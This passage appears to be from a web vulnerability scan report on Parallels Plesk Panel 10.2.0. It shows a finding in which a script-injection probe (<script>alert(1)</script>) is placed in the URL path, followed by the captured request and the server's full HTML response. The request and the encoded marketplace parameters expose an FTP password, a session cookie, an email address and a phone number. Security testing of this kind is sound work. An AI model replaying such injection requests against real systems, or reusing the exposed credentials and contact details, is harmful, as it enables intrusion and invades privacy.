ZWZpbmVkJTI2ZGV0YWlscyUyNTVCYXBwSWQlMjU1RCUzRGh0dHBzJTI1M0ElMjUyRiUyNTJGd3d3LmtlZXBpdC5jb20lMjUyRnVubGltaXRlZCUyNmRldGFpbHMlMjU1Qm5hbWUlMjU1RCUzREtlZXBpdCUyQk9ubGluZSUyQkJhY2t1cCUyNmRldGFpbHMlMjU1QnZlcnNpb24lMjU1RCUzRDElMjZkZXRhaWxzJTI1NUJyZWxlYXNlJTI1NUQlM0QxJTI2ZGV0YWlscyUyNTVCdmVuZG9yJTI1NUQlM0RLZWVwaXQlMjZkZXRhaWxzJTI1NUJwYWNrYWdlciUyNTVEJTNES2VlcGl0JTI2ZGV0YWlscyUyNTVCaXNBcHMlMjU1RCUzRDAlMjZkZXRhaWxzJTI1NUJwYWNrYWdlVXJsJTI1NUQlM0RodHRwcyUyNTNBJTI1MkYlMjUyRnd3dy5rZWVwaXQuY29tJTI1MkZkb3dubG9hZHN0ZXAmT3BlcmF0aW9uSUQ9UFVSQ0hBU0VfQVBQTElDQVRJT05fTElDRU5TRSZhcHBfdmVuZG9yX25hbWU9S2VlcGl0JmFwcF9uYW1lPUtlZXBpdCtPbmxpbmUrQmFja3VwJmFwcF92ZXJzaW9uPTEmYXBwX3JlbGVhc2U9MSZhcHBfZ3VpZD1odHRwcyUzQSUyRiUyRnd3dy5rZWVwaXQuY29tJTJGdW5saW1pdGVkJg=="); apsCatalog.showDetails({"id":"50561804184fcd759d8a74a126d50435","guid":"tag:catalog.marketplace.parallels.com,2009-07-27:\/none\/Keepit\/Keepit%20Online%20Backup\/1-1\/Keepit\/undefined\/undefined\/undefined","appId":"https:\/\/www.keepit.com\/unlimited","name":"Keepit Online Backup","version":"1","release":"1","vendor":"Keepit","packager":"Keepit","isAps":false,"packageUrl":"https:\/\/www.keepit.com\/downloadstep","rating":80,"packageId":0,"categories":["Web\/Tools"]}); return false;'><i><i><i>
<span>Buy now</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"50561804184fcd759d8a74a126d50435","guid":"tag:catalog.marketplace.parallels.com,2009-07-27:\/none\/Keepit\/Keepit%20Online%20Backup\/1-1\/Keepit\/undefined\/undefined\/undefined","appId":"https:\/\/www.keepit.com\/unlimited","name":"Keepit Online Backup","version":"1","release":"1","vendor":"Keepit","packager":"Keepit","isAps":false,"packageUrl":"https:\/\/www.keepit.com\/downloadstep","rating":80,"packageId":0,"categories":["Web\/Tools"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="even">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"031f7f49d41447a6effe31bdd0cb6f25","guid":"tag:catalog.marketplace.parallels.com,2010-10-21:\/none\/Parallels\/Parallels%20Premium%20Anti-Virus\/1-1\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.parallels.com\/store\/premiumantivirus\/","name":"Parallels Premium Anti-Virus","version":"1","release":"1","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"","rating":70,"packageId":0,"categories":[]})'><img src="http://catalog.marketplace.parallels.com/static/images/nonaps/PPAV-icon.png"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"031f7f49d41447a6effe31bdd0cb6f25","guid":"tag:catalog.marketplace.parallels.com,2010-10-21:\/none\/Parallels\/Parallels%20Premium%20Anti-Virus\/1-1\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.parallels.com\/store\/premiumantivirus\/","name":"Parallels Premium Anti-Virus","version":"1","release":"1","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"","rating":70,"packageId":0,"categories":[]})'>Parallels Premium Anti-Virus</a></h4>
<div class="package-description">Protect your customers&#039; mailboxes against worms, Trojans and other viruses</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn action" href="#" onclick='Smb.ApsLicense.buy("https://shop.marketplace.parallels.com/index.php?act=marketplace_dispatch", "bXBjX3NsYXZlX2lkPSZwc2Ffa2V5X251bWJlcj1QTFNLLjAxNTQ3NDU2LjAwMDAmcHNhX3NlcnZlcl9pcD0xNzIuMTYuMjQ4LjkxJnBzYV9sb2dpbl90eXBlPVBTQV9BRE1JTiZwc2FfbG9naW5fbmFtZT14c3NjeCZwc2FfbG9naW5fY29tcGFueT0mcHNhX2xvZ2luX2VtYWlsPWgwMjMzMiU0MGdtYWlsLmNvbSZwc2FfbG9naW5fY29udGFjdF9uYW1lPUhveXQrTExDK1Jlc2VhcmNoJnBzYV9sb2dpbl9waG9uZT0lMkIxKzMzOSsyMDYrMTg4NiZwc2FfbG9naW5fY291bnRyeT0mcHNhX2xvZ2luX2FkZHJlc3M9JnBzYV9sb2dpbl9jaXR5PSZwc2FfbG9naW5fc3RhdGU9JnBzYV9sb2dpbl96aXBjb2RlPSZwc2FfdmVyc2lvbl9udW1iZXI9MTAuMi4wJnBzYV92ZXJzaW9uX2J1aWxkPTIwMTEwNDA3LjIwJnBzYV92ZXJzaW9uX29zPVdpbmRvd3MrMjAwMyUyRjIwMDgmbG9jYWxlPWVuJmFjdGlvbj1QVVJDSEFTRV9BUFBMSUNBVElPTl9MSUNFTlNFJnBzYV9hcGlfdXJsPWh0dHBzJTNBJTJGJTJGMTcyLjE2LjI0OC45MSUzQTg0NDMlMkZlbnRlcnByaXNlJTJGY29udHJvbCUyRmFnZW50LnBocCZwcm90b2NvbF92ZXJzaW9uPTEuMCZiYWNrX3JlZGlyZWN0X3VybD1odHRwJTNBJTJGJTJGd3d3Lm5vc2VkaXZlc2FpbGluZy5jb20lM0E4ODgwJTJGc21iJTJGYXBwJTJGbWFya2V0JTJGaWQlMkZtYXJrZXRwbGFjZSUzRmRldGFpbHMlMjU1Qmd1aWQlMjU1RCUzRHRhZyUyNTNBY2F0YWxvZy5tYXJrZXRwbGFjZS5wYXJhbGxlbHMuY29tJTI1MkMyMDEwLTEwLTIxJTI1M0ElMjUyRm5vbmUlMjUyRlBhcmFsbGVscyUyNTJGUGFyYWxsZWxzJTI1MjUyMFByZW1pdW0lMjUyNTIwQW50aS1WaXJ1cyUyNTJGMS0xJTI1MkZQYXJhbGxlbHMlMjUyRnVuZGVmaW5lZCUyNTJGdW5kZWZpbmVkJTI1MkZ1bmRlZmluZWQlMjZkZXRhaWxzJTI1NUJhcHBJZCUyNTVEJTNEaHR0cCUyNTNBJTI1MkYlMjUyRnd3dy5wYXJhbGxlbHMuY29tJTI1MkZzdG9yZSUyNTJGcHJlbWl1bWFudGl2aXJ1cyUyNTJGJTI2ZGV0YWlscyUyNTVCbmFtZSUyNTVEJTNEUGFyYWxsZWxzJTJCUHJlbWl1bSUyQkFudGktVmlydXMlMjZkZXRhaWxzJTI1NUJ2ZXJzaW9uJTI1NUQlM0QxJTI2ZGV0YWlscyUyNTVCcmVsZWFzZSUyNTVEJTNEMSUyNmRldGFpbHMlMjU1QnZlbmRvciUyNTVEJTNEUGFyYWxsZWxzJTI2ZGV0YWlscyUyNTVCcGFja2FnZXIlMjU1RCUzRFBhcmFsbGVscyUyNmRldGFpbHMlMjU1QmlzQXBzJTI1NUQlM0QwJTI2ZGV0YWlscyUyNTVCcGFja2FnZVVybCUyNTVEJTNEJk9wZXJhdGlvbklEPVBVUkNIQVNFX0FQUExJQ0FUSU9OX0xJQ0VOU0UmYXBwX3ZlbmRvcl9uYW1lPVBhcmFsbGVscyZhcHBfbmFtZT1QYXJhbGxlbHMrUHJlbWl1bStBbnRpLVZpcnVzJmFwcF92ZXJzaW9uPTEmYXBwX3JlbGVhc2U9MSZhcHBfZ3VpZD1odHRwJTNBJTJGJTJGd3d3LnBhcmFsbGVscy5jb20lMkZzdG9yZSUyRnByZW1pdW1hbnRpdmlydXMlMkYm"); apsCatalog.showDetails({"id":"031f7f49d41447a6effe31bdd0cb6f25","guid":"tag:catalog.marketplace.parallels.com,2010-10-21:\/none\/Parallels\/Parallels%20Premium%20Anti-Virus\/1-1\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.parallels.com\/store\/premiumantivirus\/","name":"Parallels Premium Anti-Virus","version":"1","release":"1","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"","rating":70,"packageId":0,"categories":[]}); return false;'><i><i><i>
<span>Buy now</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"031f7f49d41447a6effe31bdd0cb6f25","guid":"tag:catalog.marketplace.parallels.com,2010-10-21:\/none\/Parallels\/Parallels%20Premium%20Anti-Virus\/1-1\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.parallels.com\/store\/premiumantivirus\/","name":"Parallels Premium Anti-Virus","version":"1","release":"1","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"","rating":70,"packageId":0,"categories":[]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="odd">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"7e226faac0bd8495bd9a86e683d8426e","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1\/www.phpbb.com\/phpBB\/3.0.4-4\/parallels.com\/undefined\/undefined\/undefined","appId":"http:\/\/www.phpbb.com\/phpBB","name":"phpBB","version":"3.0.4","release":"4","vendor":"www.phpbb.com","packager":"parallels.com","isAps":true,"packageUrl":"","rating":60,"packageId":0,"categories":["Web\/Forum"]})'><img src="http://catalog.marketplace.parallels.com/storage/www.phpbb.com/phpBB/3.0.4-4/parallels.com/undefined/undefined/undefined/resources/images/icon.png"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"7e226faac0bd8495bd9a86e683d8426e","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1\/www.phpbb.com\/phpBB\/3.0.4-4\/parallels.com\/undefined\/undefined\/undefined","appId":"http:\/\/www.phpbb.com\/phpBB","name":"phpBB","version":"3.0.4","release":"4","vendor":"www.phpbb.com","packager":"parallels.com","isAps":true,"packageUrl":"","rating":60,"packageId":0,"categories":["Web\/Forum"]})'>phpBB</a></h4>
<div class="package-description">Create a web forum or bulletin board in minutes</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn" href="#" onclick='apsCatalog.install({"id":"7e226faac0bd8495bd9a86e683d8426e","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1\/www.phpbb.com\/phpBB\/3.0.4-4\/parallels.com\/undefined\/undefined\/undefined","appId":"http:\/\/www.phpbb.com\/phpBB","name":"phpBB","version":"3.0.4","release":"4","vendor":"www.phpbb.com","packager":"parallels.com","isAps":true,"packageUrl":"","rating":60,"packageId":0,"categories":["Web\/Forum"]});return false;; return false;'><i><i><i>
<span>Install</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"7e226faac0bd8495bd9a86e683d8426e","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1\/www.phpbb.com\/phpBB\/3.0.4-4\/parallels.com\/undefined\/undefined\/undefined","appId":"http:\/\/www.phpbb.com\/phpBB","name":"phpBB","version":"3.0.4","release":"4","vendor":"www.phpbb.com","packager":"parallels.com","isAps":true,"packageUrl":"","rating":60,"packageId":0,"categories":["Web\/Forum"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="even">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"9fb54e3878b6fc9ffdafe03546f6817c","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/gallery.menalto.com\/gallery\/2.3.1-4\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/gallery.menalto.com\/","name":"gallery","version":"2.3.1","release":"4","vendor":"gallery.menalto.com","packager":"Parallels","isAps":true,"packageUrl":"","rating":50,"packageId":0,"categories":["Web\/Gallery"]})'><img src="http://catalog.marketplace.parallels.com/storage/gallery.menalto.com/gallery/2.3.1-4/Parallels/undefined/undefined/undefined/resources/images/icon.png"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"9fb54e3878b6fc9ffdafe03546f6817c","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/gallery.menalto.com\/gallery\/2.3.1-4\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/gallery.menalto.com\/","name":"gallery","version":"2.3.1","release":"4","vendor":"gallery.menalto.com","packager":"Parallels","isAps":true,"packageUrl":"","rating":50,"packageId":0,"categories":["Web\/Gallery"]})'>gallery</a></h4>
<div class="package-description">Quickly organize your photos online</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn" href="#" onclick='apsCatalog.install({"id":"9fb54e3878b6fc9ffdafe03546f6817c","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/gallery.menalto.com\/gallery\/2.3.1-4\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/gallery.menalto.com\/","name":"gallery","version":"2.3.1","release":"4","vendor":"gallery.menalto.com","packager":"Parallels","isAps":true,"packageUrl":"","rating":50,"packageId":0,"categories":["Web\/Gallery"]});return false;; return false;'><i><i><i>
<span>Install</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"9fb54e3878b6fc9ffdafe03546f6817c","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/gallery.menalto.com\/gallery\/2.3.1-4\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/gallery.menalto.com\/","name":"gallery","version":"2.3.1","release":"4","vendor":"gallery.menalto.com","packager":"Parallels","isAps":true,"packageUrl":"","rating":50,"packageId":0,"categories":["Web\/Gallery"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="odd">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"77410f204e0929a7aa85cd65c74796d8","guid":"tag:catalog.marketplace.parallels.com,2011-03-06:\/none\/Parallels\/Trustwave%20PCI%20Validation\/1-0\/Parallels\/undefined\/undefined\/undefined","appId":"https:\/\/www.trustwave.com\/vulnerabilityScanning.php","name":"Trustwave PCI Validation","version":"1","release":"0","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"https:\/\/www.trustkeeper.net\/esp\/Login.public","rating":50,"packageId":0,"categories":["Back office\/Compliance and Risk Management"]})'><img src="http://catalog.marketplace.parallels.com/static/images/nonaps/trust_wave.jpg"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"77410f204e0929a7aa85cd65c74796d8","guid":"tag:catalog.marketplace.parallels.com,2011-03-06:\/none\/Parallels\/Trustwave%20PCI%20Validation\/1-0\/Parallels\/undefined\/undefined\/undefined","appId":"https:\/\/www.trustwave.com\/vulnerabilityScanning.php","name":"Trustwave PCI Validation","version":"1","release":"0","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"https:\/\/www.trustkeeper.net\/esp\/Login.public","rating":50,"packageId":0,"categories":["Back office\/Compliance and Risk Management"]})'>Trustwave PCI Validation</a></h4>
<div class="package-description">Utilize Trustwave monthly server scans to keep you PCI compliant</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn action" href="#" onclick='Smb.ApsLicense.buy("https://shop.marketplace.parallels.com/index.php?act=marketplace_dispatch", "bXBjX3NsYXZlX2lkPSZwc2Ffa2V5X251bWJlcj1QTFNLLjAxNTQ3NDU2LjAwMDAmcHNhX3NlcnZlcl9pcD0xNzIuMTYuMjQ4LjkxJnBzYV9sb2dpbl90eXBlPVBTQV9BRE1JTiZwc2FfbG9naW5fbmFtZT14c3NjeCZwc2FfbG9naW5fY29tcGFueT0mcHNhX2xvZ2luX2VtYWlsPWgwMjMzMiU0MGdtYWlsLmNvbSZwc2FfbG9naW5fY29udGFjdF9uYW1lPUhveXQrTExDK1Jlc2VhcmNoJnBzYV9sb2dpbl9waG9uZT0lMkIxKzMzOSsyMDYrMTg4NiZwc2FfbG9naW5fY291bnRyeT0mcHNhX2xvZ2luX2FkZHJlc3M9JnBzYV9sb2dpbl9jaXR5PSZwc2FfbG9naW5fc3RhdGU9JnBzYV9sb2dpbl96aXBjb2RlPSZwc2FfdmVyc2lvbl9udW1iZXI9MTAuMi4wJnBzYV92ZXJzaW9uX2J1aWxkPTIwMTEwNDA3LjIwJnBzYV92ZXJzaW9uX29zPVdpbmRvd3MrMjAwMyUyRjIwMDgmbG9jYWxlPWVuJmFjdGlvbj1QVVJDSEFTRV9BUFBMSUNBVElPTl9MSUNFTlNFJnBzYV9hcGlfdXJsPWh0dHBzJTNBJTJGJTJGMTcyLjE2LjI0OC45MSUzQTg0NDMlMkZlbnRlcnByaXNlJTJGY29udHJvbCUyRmFnZW50LnBocCZwcm90b2NvbF92ZXJzaW9uPTEuMCZiYWNrX3JlZGlyZWN0X3VybD1odHRwJTNBJTJGJTJGd3d3Lm5vc2VkaXZlc2FpbGluZy5jb20lM0E4ODgwJTJGc21iJTJGYXBwJTJGbWFya2V0JTJGaWQlMkZtYXJrZXRwbGFjZSUzRmRldGFpbHMlMjU1Qmd1aWQlMjU1RCUzRHRhZyUyNTNBY2F0YWxvZy5tYXJrZXRwbGFjZS5wYXJhbGxlbHMuY29tJTI1MkMyMDExLTAzLTA2JTI1M0ElMjUyRm5vbmUlMjUyRlBhcmFsbGVscyUyNTJGVHJ1c3R3YXZlJTI1MjUyMFBDSSUyNTI1MjBWYWxpZGF0aW9uJTI1MkYxLTAlMjUyRlBhcmFsbGVscyUyNTJGdW5kZWZpbmVkJTI1MkZ1bmRlZmluZWQlMjUyRnVuZGVmaW5lZCUyNmRldGFpbHMlMjU1QmFwcElkJTI1NUQlM0RodHRwcyUyNTNBJTI1MkYlMjUyRnd3dy50cnVzdHdhdmUuY29tJTI1MkZ2dWxuZXJhYmlsaXR5U2Nhbm5pbmcucGhwJTI2ZGV0YWlscyUyNTVCbmFtZSUyNTVEJTNEVHJ1c3R3YXZlJTJCUENJJTJCVmFsaWRhdGlvbiUyNmRldGFpbHMlMjU1QnZlcnNpb24lMjU1RCUzRDElMjZkZXRhaWxzJTI1NUJyZWxlYXNlJTI1NUQlM0QwJTI2ZGV0YWlscyUyNTVCdmVuZG9yJTI1NUQlM0RQYXJhbGxlbHMlMjZkZXRhaWxzJTI1NUJwYWNrYWdlciUyNTVEJTNEUGFyYWxsZWxzJTI2ZGV0YWlscyUyNTVCaXNBcHMlMjU1RCUzRDAlMjZkZXRhaWxzJTI1NUJwYWNrYWdlVXJsJTI1NUQlM0RodHRwcyUyNTNBJTI1MkYlMjUyRnd3dy50cnVzdGtlZXBlci5uZXQlMjUyRmVzcCUyNTJGTG9naW4ucHVibGljJk9wZXJhdGlvbklEPVBVUkNIQVNFX0FQUExJQ0FUSU9OX0xJQ0VOU0UmYXBwX3ZlbmRvcl9uYW1lPVBhcmFsbGVscyZhcHBfbmFtZT1UcnVzdHdhdmUrUENJK1ZhbGlkYXRpb24mYXBwX3ZlcnNpb249MSZhcHBfcmVsZWFzZT0wJmFwcF9ndWlkPWh0dHBzJTNBJTJGJTJGd3d3LnRydXN0d2F2ZS5jb20lMkZ2dWxuZXJhYmlsaXR5U2Nhbm5pbmcucGhwJg=="); apsCatalog.showDetails({"id":"77410f204e0929a7aa85cd65c74796d8","guid":"tag:catalog.marketplace.parallels.com,2011-03-06:\/none\/Parallels\/Trustwave%20PCI%20Validation\/1-0\/Parallels\/undefined\/undefined\/undefined","appId":"https:\/\/www.trustwave.com\/vulnerabilityScanning.php","name":"Trustwave PCI Validation","version":"1","release":"0","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"https:\/\/www.trustkeeper.net\/esp\/Login.public","rating":50,"packageId":0,"categories":["Back office\/Compliance and Risk Management"]}); return false;'><i><i><i>
<span>Buy now</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"77410f204e0929a7aa85cd65c74796d8","guid":"tag:catalog.marketplace.parallels.com,2011-03-06:\/none\/Parallels\/Trustwave%20PCI%20Validation\/1-0\/Parallels\/undefined\/undefined\/undefined","appId":"https:\/\/www.trustwave.com\/vulnerabilityScanning.php","name":"Trustwave PCI Validation","version":"1","release":"0","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"https:\/\/www.trustkeeper.net\/esp\/Login.public","rating":50,"packageId":0,"categories":["Back office\/Compliance and Risk Management"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li></ul></div>

8.4. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/fdf080d9f1bbdb1b327620b2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/fdf080d9f1bbdb1b327620b2

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/fdf080d9f1bbdb1b327620b2?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/script%3E?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com
Cookie: PLESKSESSID=544bdaf6dd2753ce86a143b36e3245b8; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:38:19 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:38:19 GMT
Connection: close
Content-Length: 40367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="48333f77aef379c04c82252b59636182" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>Websites &amp; Domains - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="web-sites-and-domains">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/web/action-name/view" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fweb%2Fview%2Fid%2F1%2F%253Cscript%253Ealert%281%29%253C%2Ffdf080d9f1bbdb1b327620b2%3Fdom_id%3D1%26dom_name%3Dvulnerable.host.fqdn%26ftp_user%3Dxsscx%26ftp_pass%3DLL12345%252521%252521%26cl_id%3D2%26cname%3DHoyt%2BLLC%2BResearch%26pname%3DHoyt%2BLLC%2BResearch%26email%3Dh02332%2540gmail.com' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
</div>
<h2><span>Websites &amp; Domains</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
//<![CDATA[
Jsw.namespace('Smb.Views.Web');

Smb.Views.Web.updateSiteCopyStatus = function() {
new Ajax.Request(Jsw.baseUrl + '/web/site-copy-status/taskId/', {
method: 'get',
parameters: {},
onSuccess: function(transport) {
var result = transport.responseText.evalJSON();

if ('running' == result.status) {
setTimeout("Smb.Views.Web.updateSiteCopyStatus()", 10000);
} else {
$('siteCopyProgress').remove();
if ('ok' == result.status) {
Jsw.addStatusMessage('info', result.message);
} else {
Jsw.addStatusMessage('error', result.message);
}
}
}
});
}

Jsw.onReady(function() {

new Jsw.Container({
renderTo: 'main',
items: [{
componentType: 'Jsw.Hint',
hint: 'This is where you set up and manage websites. If you have several subscriptions associated with your account, then you can switch from one subscription to another by selecting the required subscription at the top of the screen. Note that you can host a number of websites under a single subscription, so there is no need to purchase any additional subscriptions.' }, {
componentType: 'Jsw.ListContainer',
cls: 'tools-list',
itemClass: 'tools-item',
items: [null,null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/site-aps_32.gif","title":"Applications","comment":"Install and manage web apps on your websites. Forums, photo galleries, collaboration tools, and many more installed in several clicks.","href":"\/app"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/file-manager_32.gif","title":"File Manager","comment":"Upload new files and work with current files and directories of your websites.","href":"\/web\/file-manager"},null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/web-stats_32.gif","title":"Web Statistics","comment":"View the reports on how your websites are visited: See how many people visited a site and which webpages they viewed.","handler":"function() { window.open(\"http:\/\/vulnerable.host.fqdn\/plesk-stat\/webstat\", \"_blank\", 